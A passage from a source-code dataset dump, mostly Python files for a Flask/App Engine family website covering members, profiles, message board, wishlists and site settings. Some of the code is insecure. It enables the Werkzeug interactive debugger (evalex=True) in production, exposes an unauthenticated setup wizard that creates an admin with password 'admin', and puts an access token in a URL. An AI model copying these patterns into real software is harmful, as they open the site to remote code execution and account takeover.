"text": "from gitlab import Gitlab\n\n\ndef create(key, repository, title, description, head, base='master', close_source_branch=False, reviewer=None,\n label=None, url='https://gitlab.com/', **_):\n if not reviewer:\n reviewer = []\n gl = Gitlab(url=url, private_token=key)\n assignee_ids = [\n gl_id(r, gl.users, 'username')\n for r\n in reviewer\n ]\n project_id = gl_id(repository, gl.projects)\n project = gl.projects.get(project_id)\n mr = project.mergerequests.create({\n 'title': title,\n 'description': description,\n 'source_branch': head,\n 'target_branch': base,\n 'label': label,\n 'assignee_ids': assignee_ids,\n 'remove_source_branch': close_source_branch,\n })\n return str(mr)\n\n\ndef is_integral(var):\n try:\n int(var)\n return True\n except ValueError:\n return False\n\n\ndef gl_id(name, objects, field='name'):\n if is_integral(name):\n return name\n results = objects.list(**{field: name})\n return results[0].id if results else name\n"
},
{
"alpha_fraction": 0.6287878751754761,
"alphanum_fraction": 0.6287878751754761,
"avg_line_length": 28.33333396911621,
"blob_id": "a0c00eebe20550942d7bfba0ef1a2e2b7cf3a25a",
"content_id": "731c994bfd3e8c4d9a9128fe69a3786c4eee485e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 528,
"license_type": "permissive",
"max_line_length": 101,
"num_lines": 18,
"path": "/pullrequest/github.py",
"repo_name": "eerorika/pullrequest",
"src_encoding": "UTF-8",
"text": "from github import Github, Repository\n\n\ndef create(key, repository, title, description, head, base='master', reviewer=None, label=None, **_):\n g = Github(key)\n repo_obj = g.get_repo(repository) # type: Repository.Repository\n pr = repo_obj.create_pull(\n title=title,\n body=description,\n head=head,\n base=base,\n )\n if label:\n pr.add_to_labels(*label)\n if reviewer:\n pr.add_to_assignees(*reviewer)\n pr.create_review_request(reviewers=reviewer)\n return str(pr)\n"
}
] | 5 |
trungly/thelyfamily
|
https://github.com/trungly/thelyfamily
|
1154dc484bb39eb6fed6d08472b62c75a4fd0cd2
|
06620e10e6837f878a27f7a38dd2caa4f21f3002
|
ef29b0e3b009153e83dce1a6bc985d4e5e37550e
|
refs/heads/master
| 2021-06-30T12:33:14.706435 | 2019-10-13T18:28:06 | 2019-10-13T18:28:06 | 15,833,304 | 1 | 0 | null | 2014-01-12T00:11:16 | 2019-10-13T18:28:16 | 2021-06-02T21:45:58 |
HTML
|
[
{
"alpha_fraction": 0.6934097409248352,
"alphanum_fraction": 0.6943648457527161,
"avg_line_length": 35.10344696044922,
"blob_id": "dcc103109e8f19c6555e14c38d86673a37106f41",
"content_id": "e2df0f875a05694634e6e0537b46f40ad21fb3ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3141,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 87,
"path": "/family/views/profile.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from google.appengine.ext import blobstore\nfrom werkzeug.exceptions import Unauthorized, BadRequest\nfrom flask import current_app, g, url_for, render_template, request, flash, redirect\nfrom family.decorators import requires_login\nfrom family.forms import ChangePasswordForm, MemberProfileForm\nfrom family import app\n\n\[email protected]('/profile', methods=['GET'])\n@requires_login\ndef profile():\n form = MemberProfileForm(request.form, g.member.profile)\n return _render_profile(form)\n\n\ndef _render_profile(form):\n form.member_id.data = g.member.key.id()\n form.first_name.data = g.member.first_name\n form.last_name.data = g.member.last_name\n photo_upload_url = blobstore.create_upload_url(url_for('profile_photo'))\n profile_photo_url = g.member.profile.photo_url\n instagram_auth_url = 'https://instagram.com/oauth/authorize/?client_id={client_id}&redirect_uri={redirect_uri}&response_type=code'\n instagram_auth_url = instagram_auth_url.format(\n client_id=current_app.settings.get('instagram.client.id'),\n redirect_uri='http://%s/photos/return' % current_app.settings.get('host.name'),\n )\n facebook_auth_url = 'https://www.facebook.com/dialog/oauth?client_id={app_id}&redirect_uri={redirect_uri}&scope={scope}'\n facebook_auth_url = facebook_auth_url.format(\n app_id=current_app.settings.get('facebook.app.id'),\n redirect_uri='http://%s/facebook/return' % current_app.settings.get('host.name'),\n scope='user_photos'\n )\n\n context = {\n 'form': form,\n 'password_form': ChangePasswordForm(),\n 'photo_upload_url': photo_upload_url,\n 'profile_photo_url': profile_photo_url,\n 'instagram_auth_url': instagram_auth_url,\n 'facebook_auth_url': facebook_auth_url,\n }\n return render_template('profile.html', **context)\n\n\[email protected]('/profile', methods=['POST'])\n@requires_login\ndef profile_update():\n form = MemberProfileForm(request.form)\n\n # ensure members can only update their own profiles\n if str(form.member_id.data) != str(g.member.key.id()):\n return Unauthorized()\n\n if not form.validate():\n return _render_profile(form)\n\n profile = g.member.profile_key.get()\n\n # update member and profile based on form values\n g.member.first_name = form.first_name.data\n g.member.last_name = form.last_name.data\n profile.primary_email = form.primary_email.data\n profile.secondary_email = form.secondary_email.data\n profile.address = form.address.data\n profile.city = form.city.data\n profile.state = form.state.data\n profile.zip = form.zip.data\n profile.mobile_phone = form.mobile_phone.data\n profile.home_phone = form.home_phone.data\n profile.work_phone = form.work_phone.data\n profile.birth_date = form.birth_date.data\n\n profile.put()\n g.member.put()\n flash('Profile updated', 'success')\n\n return redirect(url_for('profile'))\n\n\[email protected]('/profile/notifications/update', methods=['POST'])\n@requires_login\ndef update_notifications():\n if not request.is_xhr:\n return BadRequest()\n\n g.member.profile.update_notifications(request.form)\n return '', 200\n"
},
{
"alpha_fraction": 0.664898157119751,
"alphanum_fraction": 0.6665959358215332,
"avg_line_length": 37,
"blob_id": "d4ef3d5ef2af1f8f5f71e9ed34e3f12970a8cd1b",
"content_id": "f6f3ecca1d73a81ce9710dda372b4b422f7a30f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4712,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 124,
"path": "/family/models/member.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import datetime\n\nfrom google.appengine.api import images\nfrom google.appengine.ext import ndb\n\nfrom family.models.instagram import InstagramUser\nfrom family.models.facebook import FacebookUser\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom werkzeug.utils import cached_property\nfrom flask import current_app\n\n\nclass Member(ndb.Model):\n \"\"\" Represents a user of this website \"\"\"\n\n first_name = ndb.StringProperty(required=True) # should be unique (as we use it for login)\n first_name_lowercase = ndb.ComputedProperty(lambda self: self.first_name.lower()) # allow case-insensitive login\n last_name = ndb.StringProperty(required=True)\n hashed_password = ndb.StringProperty(required=True)\n is_visible = ndb.BooleanProperty(default=True) # whether this user shows up on Members page\n is_admin = ndb.BooleanProperty(default=False) # whether this user a site admin\n is_subscribed_to_chat = ndb.BooleanProperty(default=False)\n age = ndb.ComputedProperty(lambda self: self.current_age())\n message_board_visited = ndb.DateTimeProperty()\n new_messages = ndb.ComputedProperty(lambda self: self.number_new_messages())\n\n profile_key = ndb.KeyProperty(kind='Profile')\n google_user_key = ndb.KeyProperty(kind='GoogleUser')\n facebook_user_key = ndb.KeyProperty(kind='FacebookUser')\n instagram_user_key = ndb.KeyProperty(kind='InstagramUser')\n\n @cached_property\n def profile(self):\n if self.profile_key:\n return self.profile_key.get()\n else:\n return Profile.create_for_member(self)\n\n @cached_property\n def instagram_user(self):\n if self.instagram_user_key:\n return self.instagram_user_key.get()\n else:\n return InstagramUser.create_for_member(self)\n\n @cached_property\n def facebook_user(self):\n if self.facebook_user_key:\n return self.facebook_user_key.get()\n else:\n return FacebookUser.create_for_member(self)\n\n def current_age(self):\n if not self.profile.birth_date:\n return ''\n return int((datetime.date.today() - self.profile.birth_date).days/365.2425)\n\n def set_password(self, password):\n self.hashed_password = generate_password_hash(password)\n\n def check_password(self, password):\n return check_password_hash(self.hashed_password, password)\n\n def number_new_messages(self):\n query = ndb.gql(\"SELECT __key__ FROM Message WHERE posted_date > :1\", self.message_board_visited)\n return query.count()\n\n\nclass Profile(ndb.Model):\n \"\"\" Represents a member's profile. There is a one to one relationship between Member and Profile \"\"\"\n\n member_key = ndb.KeyProperty(kind=Member)\n primary_email = ndb.StringProperty()\n secondary_email = ndb.StringProperty()\n address = ndb.StringProperty()\n city = ndb.StringProperty()\n state = ndb.StringProperty()\n zip = ndb.StringProperty()\n mobile_phone = ndb.StringProperty()\n home_phone = ndb.StringProperty()\n work_phone = ndb.StringProperty()\n birth_date = ndb.DateProperty()\n photo_key = ndb.BlobKeyProperty()\n notify_message_posted = ndb.BooleanProperty()\n notify_birthday_reminders = ndb.BooleanProperty()\n\n @cached_property\n def member(self):\n if self.member_key:\n return self.member_key.get()\n else:\n # this profile has no associated member for some reason, search all members for this profile\n import logging\n log = logging.getLogger(__name__)\n log.warning('Hmm, there appears to be an un-owned profile: id=%s' % self.key.id())\n return Member.query(Member.profile_key == self.key).get()\n\n @cached_property\n def photo_url(self):\n if self.photo_key:\n try:\n return images.get_serving_url(str(self.photo_key))\n except Exception, e:\n current_app.logger.error('Could not load member profile photo for %s' % member_key)\n return None\n else:\n return None\n\n def update_notifications(self, selections):\n all_notify_flags = ['notify_message_posted', 'notify_birthday_reminders']\n for flag in all_notify_flags:\n # clear notification flags first because only selected checkbox selections get submitted here\n setattr(self, flag, False)\n if flag in selections:\n setattr(self, flag, True)\n self.put()\n\n @classmethod\n def create_for_member(cls, member):\n new_profile = Profile(member_key=member.key)\n new_profile.put()\n member.profile_key = new_profile.key\n member.put()\n return new_profile\n"
},
{
"alpha_fraction": 0.7258785963058472,
"alphanum_fraction": 0.7258785963058472,
"avg_line_length": 38.125,
"blob_id": "940252d9752019eacbaf17887851725134a606ab",
"content_id": "59ee22abc1a14aecccfadfc8eda8b102cde6380c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1565,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 40,
"path": "/family/forms.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from flask_wtf import Form\nfrom wtforms.ext.appengine.ndb import model_form\nfrom wtforms.fields import StringField, HiddenField, PasswordField\nfrom wtforms import validators\nfrom family.models.member import Profile\nfrom family.models.message import Message\n\n\nBaseProfileForm = model_form(Profile, Form, field_args={\n 'birth_date': {'validators': [validators.optional()]}} # disable DateField validator\n)\n\n\nclass MemberProfileForm(BaseProfileForm):\n member_id = HiddenField()\n first_name = StringField('First Name', [validators.input_required()])\n last_name = StringField('Last Name', [validators.input_required()])\n\n\nclass ChangePasswordForm(Form):\n old_password = PasswordField('Old Password', [validators.input_required()])\n new_password = PasswordField('New Password', [\n validators.input_required(),\n validators.equal_to('confirm_password', message='Passwords must match')\n ])\n confirm_password = PasswordField('Re-type New Password', [\n validators.input_required(),\n validators.equal_to('new_password', message='Passwords must match')\n ])\n\n\nMessageForm = model_form(Message, Form)\n\n\nclass SetupWizardForm(Form):\n admin_first_name = StringField('Admin first name', [validators.input_required()])\n admin_last_name = StringField('Admin last name', [validators.input_required()])\n site_name = StringField('Site name', [validators.input_required()])\n secret_key = StringField('Secret key', [validators.input_required()])\n host_name = StringField('Website address', [validators.input_required()])\n"
},
{
"alpha_fraction": 0.6332230567932129,
"alphanum_fraction": 0.6350606679916382,
"avg_line_length": 35.279998779296875,
"blob_id": "8382d664ca6ebab541413b1bc564189670d2b1fd",
"content_id": "a3cfec7531bdbd12858499cc3f079f7c4c50e010",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2721,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 75,
"path": "/family/views/main.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import pytz\n\nfrom datetime import datetime\nfrom flask import render_template, request, redirect, url_for\nfrom family.decorators import requires_login\nfrom family.models.member import Member, Profile\nfrom family.forms import SetupWizardForm\nfrom family import app\n\n\nANNOUNCE_RANGE_IN_DAYS = 14\n\n\[email protected]('/', methods=['GET'])\ndef home():\n return render_template(\n 'home.html',\n settings_initialized=app.settings.initialized,\n birthday_reminders=get_birthday_reminders()\n )\n\n\[email protected]('/members', methods=['GET'])\n@requires_login\ndef members():\n members = Member.query().fetch()\n return render_template('members.html', members=members)\n\n\ndef get_birthday_reminders():\n reminders = {}\n profiles = Profile.query()\n for profile in profiles:\n today = datetime.now(pytz.timezone('US/Eastern')).date() # TODO: let users set their timezone in member profile\n bday = profile.birth_date\n if bday:\n delta = bday.timetuple().tm_yday - today.timetuple().tm_yday\n if today.month == bday.month and today.day == bday.day: # can't simply use delta cuz it breaks on leap years\n reminders[profile.member.first_name] = 0\n elif 0 < delta < ANNOUNCE_RANGE_IN_DAYS:\n reminders[profile.member.first_name] = delta\n return sorted(reminders.iteritems(), key=lambda x: x[1]) # returns a list of tuples sorted by delta\n\n\[email protected]('/admin/setup/wizard', methods=['GET', 'POST'])\ndef setup_wizard():\n form = SetupWizardForm(request.form)\n if request.method == 'GET':\n form.admin_first_name.data = ''\n form.admin_last_name.data = ''\n form.site_name.data = app.settings.get('site.name')\n form.secret_key.data = app.settings.get('secret.key')\n form.host_name.data = app.settings.get('host.name')\n elif request.method == 'POST' and form.validate():\n admin = Member.query(\n Member.first_name_lowercase == form.admin_first_name.data.lower()\n and\n Member.first_name_lowercase == form.admin_last_name.data.lower()\n ).get()\n if not admin:\n admin = Member(\n first_name=form.admin_first_name.data,\n last_name=form.admin_last_name.data,\n is_admin=True,\n )\n admin.set_password('admin')\n admin.put()\n\n app.settings.set('site.name', form.site_name.data)\n app.settings.set('secret.key', form.secret_key.data)\n app.settings.set('host.name', form.host_name.data)\n app.settings.set('settings.initialized', True)\n return redirect(url_for('home'))\n\n return render_template('setup_wizard.html', form=form)\n"
},
{
"alpha_fraction": 0.7590529322624207,
"alphanum_fraction": 0.7590529322624207,
"avg_line_length": 24.64285659790039,
"blob_id": "067f1bc9ead09c2f8bdc47924150a4882f827c08",
"content_id": "c67123a9c8e2b11f4d22ff68bcb48c38030e0794",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 718,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 28,
"path": "/family/__init__.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom family.config import setup_config\nfrom family.settings import setup_settings\nfrom family.views import setup_views\nfrom family.utils import NDBModelJSONEncoder\nfrom werkzeug.debug import DebuggedApplication\n\n\ndef create_app():\n flask_app = Flask(__name__)\n\n # load site settings from the database\n setup_settings(flask_app)\n\n # environment-aware configuration\n setup_config(flask_app)\n\n # custom NDB model serializer\n flask_app.json_encoder = NDBModelJSONEncoder\n\n return flask_app\n\n\napp = create_app()\napp.wsgi_app = DebuggedApplication(app.wsgi_app, evalex=True)\n\n# Import views only AFTER 'app' is defined, the object is used in the view decorators\nsetup_views()\n"
},
{
"alpha_fraction": 0.6514523029327393,
"alphanum_fraction": 0.6576763391494751,
"avg_line_length": 20.909090042114258,
"blob_id": "c0a068ce5ba58e789102d7e4b07547a39677adcd",
"content_id": "6e8a204068159a8d054b13c37a920a1a841e2ea5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 482,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 22,
"path": "/family/views/lists.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from flask import request, render_template, jsonify\n\nfrom family import app\nfrom family.models.list import List\n\n\[email protected]('/lists', methods=['GET'])\ndef lists():\n return render_template('lists.html')\n\n\[email protected]('/api/lists', methods=['GET'])\ndef get_lists():\n all_lists = List.query().fetch()\n return jsonify({'data': all_lists})\n\n\[email protected]('/api/lists', methods=['POST'])\ndef create_list():\n new_list = List(**request.json)\n new_list.put()\n return '', 200\n"
},
{
"alpha_fraction": 0.6663507223129272,
"alphanum_fraction": 0.6672985553741455,
"avg_line_length": 34.16666793823242,
"blob_id": "e80af757d68874aa47257073c97d115ef8d9ef8f",
"content_id": "2ccd9c02061a0f8b9d78054ef4966d106242c984",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1055,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 30,
"path": "/family/models/instagram.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from google.appengine.ext import ndb\n\n\nclass InstagramUser(ndb.Model):\n \"\"\" Represents an Instagram user including their current access_token \"\"\"\n\n userid = ndb.StringProperty()\n member_key = ndb.KeyProperty(kind='Member')\n access_token = ndb.StringProperty()\n # last_access_date = ndb.DateTimeProperty(auto_now_add=True)\n username = ndb.StringProperty()\n full_name = ndb.StringProperty()\n profile_picture = ndb.StringProperty()\n website = ndb.StringProperty()\n bio = ndb.StringProperty()\n recent_photos_url = ndb.ComputedProperty(\n lambda self: 'https://api.instagram.com/v1/users/{user_id}/media/recent?access_token={access_token}'\n .format(\n user_id=self.userid,\n access_token=self.access_token,\n )\n )\n\n @classmethod\n def create_for_member(cls, member):\n new_instagram_user = InstagramUser(member_key=member.key)\n new_instagram_user.put()\n member.instagram_user_key = new_instagram_user.key\n member.put()\n return new_instagram_user\n"
},
{
"alpha_fraction": 0.6179749965667725,
"alphanum_fraction": 0.6188670992851257,
"avg_line_length": 42.11538314819336,
"blob_id": "52bee13adebc88be3df857d6dbbffa45aae3ed99",
"content_id": "900fe4cdacf46c1d3df00ae3f0da9b986ac979fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4484,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 104,
"path": "/family/views/messages.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import datetime\n\nfrom google.appengine.api import mail\nfrom google.appengine.ext import ndb\nfrom flask import request, g, render_template, redirect, url_for, flash, current_app\nfrom family import app\nfrom family.decorators import requires_login\nfrom family.forms import MessageForm\nfrom family.models.member import Profile\nfrom family.models.message import Message\n\n\nSHOW_MESSAGES_TIME_DELTA = datetime.timedelta(days=90)\n\n\[email protected]('/messages', methods=['GET'])\n@requires_login\ndef messages():\n \"\"\"('MessageBoard', 'main') is the parent of all messages. Thus, this puts all messages into a single entity group\n \"\"\"\n form = MessageForm()\n ancestor_key = ndb.Key('MessageBoard', 'main')\n cutoff_time = datetime.datetime.now() - SHOW_MESSAGES_TIME_DELTA\n messages = Message.query(Message.posted_date > cutoff_time, ancestor=ancestor_key).order(-Message.posted_date)\n g.member.message_board_visited = datetime.datetime.now()\n g.member.put()\n return render_template('messages.html', form=form, messages=messages,\n notify_message_posted=g.member.profile.notify_message_posted)\n\n\[email protected]('/message/new', methods=['POST'])\n@requires_login\ndef message_new():\n form = MessageForm(request.form)\n if form.validate():\n ancestor_key = ndb.Key('MessageBoard', 'main')\n message = Message(parent=ancestor_key, owner_key=g.member.key, body=form.body.data,\n posted_date=datetime.datetime.now())\n message.put()\n\n # Send notification emails to everyone subscribed\n author = g.member.first_name\n posted_date = datetime.datetime.now().strftime('%A, %B %-d, %Y at %I:%M %p')\n photo_url = g.member.profile.photo_url\n if photo_url:\n image = '%s=s60' % photo_url\n else:\n image = 'http://%s/static/images/male_bust.jpg' % current_app.settings.get('host.name')\n html_body = render_template('email/new_message_posted.html', **dict(\n author=author,\n posted_date=posted_date,\n image=image,\n message_body=message.body,\n ))\n for subscriber in Profile.query(Profile.notify_message_posted == True):\n if subscriber.primary_email:\n # TODO: put a try/except here, for when mail fails\n # here is one error I got once:\n # DeadlineExceededError: The API call mail.Send() took too long to respond and was cancelled.\n mail.send_mail(\n '{email_from} <{email_address}>'.format(\n email_from=current_app.settings.get('messageboard.email.from'),\n email_address=current_app.settings.get('messageboard.email.address')\n ),\n subscriber.primary_email,\n '%s posted a new message on TheLyFamily.com' % g.member.first_name,\n '%s wrote this on %s: %s' % (author, posted_date, message.body),\n html=html_body,\n # reply_to='%s' % current_app.settings.get('messageboard.email.replyto') # TODO: this should post a message on the message board\n )\n return redirect(url_for('messages'))\n\n\[email protected]('/message/edit/<message_id>', methods=['POST'])\n@requires_login\ndef message_edit(message_id):\n form = MessageForm(request.form)\n if form.validate():\n ancestor_key = ndb.Key('MessageBoard', 'main')\n message = Message.get_by_id(int(message_id), parent=ancestor_key)\n if not message:\n flash('Cannot edit. Message not found', 'danger')\n elif message.owner != g.member:\n flash('You may only edit your own message', 'danger')\n else:\n flash('Message successfully updated!', 'info')\n message.body = form.data['body']\n message.put()\n return redirect(url_for('messages'))\n\n\[email protected]('/message/delete/<message_id>', methods=['POST'])\n@requires_login\ndef message_delete(message_id):\n if request.form.get('_method', '').lower() == 'delete':\n ancestor_key = ndb.Key('MessageBoard', 'main')\n message = Message.get_by_id(int(message_id), parent=ancestor_key)\n if not message:\n flash('Message not found', 'danger')\n elif message.owner != g.member:\n flash('You may only delete your own message', 'danger')\n else:\n message.key.delete()\n return redirect(url_for('messages'))\n"
},
{
"alpha_fraction": 0.6878698468208313,
"alphanum_fraction": 0.6878698468208313,
"avg_line_length": 31.190475463867188,
"blob_id": "1bfebe61c9653f0b21d3a6f5e0e1a9791f274a3b",
"content_id": "1f714fe02614dcc7af7550c179c87a627d7f2291",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 676,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 21,
"path": "/family/models/facebook.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from google.appengine.ext import ndb\nfrom family.facebook import Facebook\n\n\nclass FacebookUser(ndb.Model):\n \"\"\" Represents a Facebook user\n \"\"\"\n member_key = ndb.KeyProperty(kind='Member')\n userid = ndb.IntegerProperty()\n access_token = ndb.StringProperty()\n expires_at = ndb.DateTimeProperty()\n scopes = ndb.JsonProperty()\n recent_photos_url = ndb.ComputedProperty(Facebook.uploaded_photos_url)\n\n @classmethod\n def create_for_member(cls, member):\n new_facebook_user = cls(member_key=member.key)\n new_facebook_user.put()\n member.facebook_user_key = new_facebook_user.key\n member.put()\n return new_facebook_user\n"
},
{
"alpha_fraction": 0.5704352855682373,
"alphanum_fraction": 0.5740628838539124,
"avg_line_length": 31.431371688842773,
"blob_id": "82a61380e3a0cb689abc06cae58da3b8f8d5e614",
"content_id": "f3118dc0f74734d73d35925e68603d9402dce2bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3308,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 102,
"path": "/family/settings.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import yaml\n\nfrom google.appengine.ext import ndb\nfrom google.appengine.api.datastore_errors import BadValueError\n\n\nclass Setting(ndb.Model):\n \"\"\"\n Settings model\n \"\"\"\n name = ndb.StringProperty()\n value = ndb.GenericProperty()\n\n\nclass SiteSettings(object):\n \"\"\"\n A database-backed object that holds settings for the app.\n\n TODO: Consider changing all(as_name_value_list=True) to export() and set(name_value_list) as import(),\n ... thus making the simple dictionary format the 'native' format, while still supporting name-value list format\n \"\"\"\n\n def __init__(self, app):\n \"\"\" Check if settings were initialized; if not, load them from initial_settings.yaml\n \"\"\"\n if not self.get('settings.initialized'):\n f = open('initial_settings.yaml')\n data = yaml.safe_load(f)\n local_settings = data.pop('local.settings')\n if local_settings and isinstance(local_settings, dict):\n data.update(local_settings)\n f.close()\n data['settings.initialized'] = True\n try:\n self.set_all(data)\n except BadValueError, bve:\n app.logger.error('Could not load initial settings file. Check the format.')\n raise bve\n\n @property\n def initialized(self):\n return self.get('settings.initialized')\n\n def get(self, name):\n setting = Setting.query(Setting.name == name).fetch(1)\n if len(setting):\n return setting[0].value\n else:\n return None\n\n def set(self, name, value):\n setting = Setting.query(Setting.name == name).fetch(1)\n if len(setting):\n setting = setting[0]\n setting.value = value\n else:\n setting = Setting(name=name, value=value)\n setting.put()\n\n def get_all(self, as_name_value_list=False):\n \"\"\"\n All the settings as a simple dictionary:\n { setting1: 'value1', setting2: 'value2', ... }\n Or, a name-value list:\n [\n { name: 'setting1', value: 'value1' },\n { name: 'setting2', value: 'value2' },\n ...\n ]\n \"\"\"\n settings_from_db = Setting.query().fetch()\n if as_name_value_list:\n retval = []\n for setting in settings_from_db:\n retval.append({'name': setting.name, 'value': setting.value})\n else:\n retval = dict()\n for setting in settings_from_db:\n retval[setting.name] = setting.value\n\n return retval\n\n def set_all(self, settings):\n for setting in settings:\n if isinstance(setting, basestring):\n self.set(setting, settings[setting])\n elif isinstance(setting, dict):\n # name-value list\n self.set(setting['name'], setting['value'])\n\n def as_yaml(self):\n return {str(key): str(value) for key, value in self.get_all().iteritems()}\n\n\ndef setup_settings(app):\n \"\"\" Instantiate settings object and add them to the template contexts\n \"\"\"\n app.settings = SiteSettings(app)\n\n def add_settings_to_context():\n return dict(settings=app.settings.get_all())\n app.context_processor(add_settings_to_context)\n"
},
{
"alpha_fraction": 0.6479836106300354,
"alphanum_fraction": 0.6527683138847351,
"avg_line_length": 35.12345504760742,
"blob_id": "2f9ab2c1c9f851bb4ee6194bcc7b037d2e12b7ee",
"content_id": "219ea4e0c9d7f2ce0fa38c8f7932e165ae4741f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2926,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 81,
"path": "/family/views/wishlist.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from flask import g, render_template, jsonify, request\nfrom family.decorators import requires_login\nfrom family import app\nfrom family.models.wishlist import WishlistItem\nfrom werkzeug.exceptions import BadRequest\nfrom google.appengine.ext import ndb\n\n\[email protected]('/wishlists')\n@requires_login\ndef wishlists():\n return render_template('wishlists.html')\n\[email protected]('/wishlist', methods=['GET'])\n@requires_login\ndef get_current_user_wishlist():\n results = WishlistItem.query(WishlistItem.owner_key == g.member.key).fetch()\n return jsonify({'items': results})\n\[email protected]('/wishlist', methods=['POST'])\n@requires_login\ndef add_wishlist_item():\n item = WishlistItem(owner_key=g.member.key, **request.json)\n item.put()\n return '', 200\n\[email protected]('/wishlist/<int:id>', methods=['GET'])\n@requires_login\ndef get_member_wishlist(id):\n key = ndb.Key('Member', id)\n wishlist_items = WishlistItem.query(WishlistItem.owner_key == key).fetch()\n serialized_items = []\n for item in wishlist_items:\n # append a giver (member) dict to each wishlist item\n giver = item.giver\n item_dict = item.to_dict()\n item_dict['giver'] = giver.to_dict() if giver else None\n item_dict['id'] = item.key.id()\n serialized_items.append(item_dict)\n is_current_member_wishlist = key == g.member.key\n wishlist_title = 'My wishlist' if is_current_member_wishlist else 'This is %s\\'s wishlist' % key.get().first_name\n return jsonify({'items': serialized_items, 'wishlist_title': wishlist_title, 'is_current_member_wishlist': is_current_member_wishlist})\n\[email protected]('/wishlist/<int:id>', methods=['DELETE'])\n@requires_login\ndef delete_member_wishlist_item(id):\n # only allow delete own items\n item = WishlistItem.get_by_id(id)\n if item and item.owner_key == g.member.key:\n item.key.delete()\n return '', 200\n else:\n return BadRequest()\n\[email protected]('/wishlist/<int:id>', methods=['PUT'])\n@requires_login\ndef update_member_wishlist_item(id):\n status = request.json['status']\n item = WishlistItem.get_by_id(id)\n # only allow 'reserve' and 'lock' actions\n if item and status == 'open' or status == 'reserved' or status == 'locked':\n item.update_status(status, g.member.key)\n return jsonify({'owner_id': item.owner_key.id()})\n else:\n return BadRequest()\n\[email protected]('/wishlist/members', methods=['GET'])\n@requires_login\ndef get_members_with_wishlists():\n \"\"\" returns json in the form of:\n \"members\": {\n [\n \"first_name\": \"Trung\",\n \"id\": 12345678 // member's id\n ],\n ...\n }\n \"\"\"\n member_wishlists = WishlistItem.query(projection=[\"owner_key\"], group_by=[\"owner_key\"]).fetch()\n members = [{'first_name': item.owner_key.get().first_name, 'id': item.owner_key.id()} for item in member_wishlists]\n return jsonify({'members': members})\n"
},
{
"alpha_fraction": 0.41111111640930176,
"alphanum_fraction": 0.41111111640930176,
"avg_line_length": 22.6842098236084,
"blob_id": "0d3f36ee9f16ad1026ef50474efa7534610945ad",
"content_id": "105cb0d2a2b3b44c3d20457af4db85ff8f8d882d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 450,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 19,
"path": "/static/js/app.js",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "$(function() {\n\n // submit login via Ajax\n $(\"#login-form\").submit(function(event) {\n event.preventDefault();\n $.ajax({\n type: \"POST\",\n url: \"/login\",\n data: $(this).serialize(),\n success: function() {\n window.location.reload();\n },\n error: function() {\n $(\"#login-error\").removeClass(\"hidden\")\n }\n });\n });\n\n});\n"
},
{
"alpha_fraction": 0.5838384032249451,
"alphanum_fraction": 0.5865319967269897,
"avg_line_length": 36.125,
"blob_id": "8810d0f396af76e21d9831043d72be0836670a73",
"content_id": "eaa106457153c0aed59ae65fc5e2ce22c4fb2f72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1485,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 40,
"path": "/family/models/photo.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
